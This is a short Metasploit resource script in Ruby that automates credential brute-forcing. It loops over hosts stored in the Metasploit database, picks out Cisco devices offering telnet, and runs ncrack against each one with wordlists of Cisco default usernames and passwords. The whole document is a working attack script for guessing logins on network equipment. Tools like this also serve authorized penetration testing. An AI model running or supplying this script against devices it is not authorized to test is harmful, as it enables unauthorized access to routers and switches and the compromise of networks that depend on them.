<ruby>
framework.db.hosts.each do |host|
  host.services.each do |service|
    if service.info =~ /cisco/i && service.name == "telnet"
      ncrack_cmd = "ncrack -g CL=10,to=30m -U /opt/metasploit/apps/pro/data/wordlists/telnet_cisco_default_user.txt -P /opt/metasploit/apps/pro/data/wordlists/telnet_cisco_default_pass.txt telnet://#{host.address}:#{service.port}"
      print "\n\n"
      print_status "Running ncrack on #{host.address}:#{service.port}"
      print_status "#{ncrack_cmd}"
      run = system ncrack_cmd
    end
  end
end
</ruby>
